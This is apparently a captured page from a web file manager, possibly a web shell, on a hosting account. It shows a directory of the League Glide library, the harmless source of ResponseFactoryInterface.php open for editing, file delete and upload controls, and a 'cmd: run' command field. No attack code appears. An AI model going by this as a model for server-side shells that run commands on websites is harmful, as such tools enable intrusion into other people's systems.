/
home
/
techb158
/
ileadtechnology.com
/
vendor
/
league
/
glide
/
src
/
Responses
/
/home/techb158/ileadtechnology.com/vendor/league/glide/src/Responses
mkdir
upload
Name
Size
Mode
Actions
PsrResponseFactory.php
2052
0644
edit
dl
rm
ResponseFactoryInterface.php
402
0644
edit
dl
rm
Edit:
/home/techb158/ileadtechnology.com/vendor/league/glide/src/Responses/ResponseFactoryInterface.php
(402B)
<?php namespace League\Glide\Responses; use League\Flysystem\FilesystemInterface; interface ResponseFactoryInterface { /** * Create response. * * @param FilesystemInterface $cache Cache file system. * @param string $path Cached file path. * * @return mixed The response object. */ public function create(FilesystemInterface $cache, $path); }
Save
cmd:
run